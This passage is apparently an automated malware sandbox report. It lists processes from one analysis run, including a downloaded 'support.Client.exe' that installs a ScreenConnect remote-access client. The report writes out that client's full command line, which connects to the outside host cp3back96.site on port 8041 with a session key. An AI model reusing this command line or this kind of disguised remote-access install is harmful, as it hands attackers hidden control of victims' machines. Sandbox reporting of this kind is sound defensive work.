                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                              Imagebase:0x7ff7648e0000
                                                                                                                                                                              File size:329'504 bytes
                                                                                                                                                                              MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:14:34:24
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:13
                                                                                                                                                                              Start time:14:34:27
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Users\user\Downloads\support.Client.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Downloads\support.Client.exe"
                                                                                                                                                                              Imagebase:0x250000
                                                                                                                                                                              File size:86'304 bytes
                                                                                                                                                                              MD5 hash:7B959C1EA179AF2DFC447BF8DB1E2C26
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:14:34:28
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                              Imagebase:0x212a13e0000
                                                                                                                                                                              File size:24'856 bytes
                                                                                                                                                                              MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:14:35:14
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                              Imagebase:0x7ff6b0f20000
                                                                                                                                                                              File size:468'120 bytes
                                                                                                                                                                              MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:14:35:14
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6684c0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:14:35:19
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                              Imagebase:0x780000
                                                                                                                                                                              File size:587'040 bytes
                                                                                                                                                                              MD5 hash:5DEC65C4047DE914C78816B8663E3602
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:18
                                                                                                                                                                              Start time:14:35:20
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
                                                                                                                                                                              Imagebase:0x7f0000
                                                                                                                                                                              File size:95'520 bytes
                                                                                                                                                                              MD5 hash:DC615E9D8EC81CBF2E2452516373E5A0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:14:35:20
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
                                                                                                                                                                              Imagebase:0x7f0000
                                                                                                                                                                              File size:95'520 bytes
                                                                                                                                                                              MD5 hash:DC615E9D8EC81CBF2E2452516373E5A0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:20
                                                                                                                                                                              Start time:14:35:22
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
                                                                                                                                                                              Imagebase:0xca0000
                                                                                                                                                                              File size:587'040 bytes
                                                                                                                                                                              MD5 hash:5DEC65C4047DE914C78816B8663E3602
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:21
                                                                                                                                                                              Start time:14:35:24
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"
                                                                                                                                                                              Imagebase:0x5b0000
                                                                                                                                                                              File size:587'040 bytes
                                                                                                                                                                              MD5 hash:5DEC65C4047DE914C78816B8663E3602
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:14:35:50
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                              Imagebase:0x7ff65d420000
                                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Disassembly

                                                                                                                                                                              No disassembly